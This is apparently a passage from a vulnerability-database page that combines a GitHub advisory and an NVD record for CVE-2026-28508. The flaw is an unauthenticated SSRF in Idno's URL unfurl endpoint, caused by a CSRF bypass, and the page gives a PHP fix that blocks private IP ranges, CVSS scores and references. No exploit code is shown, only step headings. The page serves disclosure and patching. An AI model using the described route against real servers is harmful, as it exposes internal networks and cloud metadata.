(filter_var($host, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {\n    // allowed\n} else {\n    return false; // block private/reserved ranges\n}\n```\n\nNote: An attempt was made to email the address provided in the [security page](security@idno.co) but the address does not exist.\n\n```\nYour message wasn\u0027t delivered to security@idno.co because the address couldn\u0027t be found, or is unable to receive mail.\n```",
  "id": "GHSA-fcrh-fqxh-6fx6",
  "modified": "2026-03-06T15:16:04Z",
  "published": "2026-03-02T21:24:37Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/idno/idno/security/advisories/GHSA-fcrh-fqxh-6fx6"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28508"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/idno/idno"
    },
    {
      "type": "WEB",
      "url": "https://github.com/idno/idno/releases/tag/1.6.4"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Idno Vulnerable to Unauthenticated SSRF via URL Unfurl Endpoint"
}

FKIE_CVE-2026-28508

Vulnerability from fkie_nvd - Published: 2026-03-06 05:16 - Updated: 2026-03-16 14:03

Severity ?

8.6 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/idno/idno/releases/tag/1.6.4	Product, Release Notes
	security-advisories@github.com	https://github.com/idno/idno/security/advisories/GHSA-fcrh-fqxh-6fx6	Exploit, Mitigation, Vendor Advisory

Impacted products

	Vendor	Product	Version
	withknown	known	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:withknown:known:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "03C6A2FD-591E-4396-B7DF-AFE37782951B",
              "versionEndExcluding": "1.6.4",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Idno is a social publishing platform. Prior to version 1.6.4, a logic error in the API authentication flow causes the CSRF protection on the URL unfurl service endpoint to be trivially bypassed by any unauthenticated remote attacker. Combined with the absence of a login requirement on the endpoint itself, this allows an attacker to force the server to make arbitrary outbound HTTP requests to any host, including internal network addresses and cloud instance metadata services, and retrieve the response content. This issue has been patched in version 1.6.4."
    },
    {
      "lang": "es",
      "value": "Idno es una plataforma de publicaci\u00f3n social. Antes de la versi\u00f3n 1.6.4, un error l\u00f3gico en el flujo de autenticaci\u00f3n de la API provoca que la protecci\u00f3n CSRF en el endpoint del servicio de expansi\u00f3n de URL sea trivialmente eludida por cualquier atacante remoto no autenticado. Combinado con la ausencia de un requisito de inicio de sesi\u00f3n en el propio endpoint, esto permite a un atacante forzar al servidor a realizar solicitudes HTTP salientes arbitrarias a cualquier host, incluyendo direcciones de red internas y servicios de metadatos de instancias en la nube, y recuperar el contenido de la respuesta. Este problema ha sido parcheado en la versi\u00f3n 1.6.4."
    }
  ],
  "id": "CVE-2026-28508",
  "lastModified": "2026-03-16T14:03:38.950",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 8.6,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 4.0,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ],
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "NONE",
          "attackVector": "NETWORK",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 9.2,
          "baseSeverity": "CRITICAL",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "NOT_DEFINED",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "NONE",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "NONE",
          "subConfidentialityImpact": "HIGH",
          "subIntegrityImpact": "NONE",
          "userInteraction": "NONE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "NONE",
          "vulnConfidentialityImpact": "HIGH",
          "vulnIntegrityImpact": "NONE",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-03-06T05:16:35.233",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Product",
        "Release Notes"
      ],
      "url": "https://github.com/idno/idno/releases/tag/1.6.4"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://github.com/idno/idno/security/advisories/GHSA-fcrh-fqxh-6fx6"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-918"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-28508 (GCVE-0-2026-28508)

GHSA-FCRH-FQXH-6FX6

Summary

Code Flow

Step 1 — Endpoint access control

Step 2 — Bypassing xhrGatekeeper()

Step 3 — Bypassing tokenGatekeeper() via premature API flag

Step 4 — The unfurl fetch

Proof of Concept

Impact

Remediation

FKIE_CVE-2026-28508

Tags

Sightings

Nomenclature

Step 3 — Bypassing `tokenGatekeeper()` via premature API flag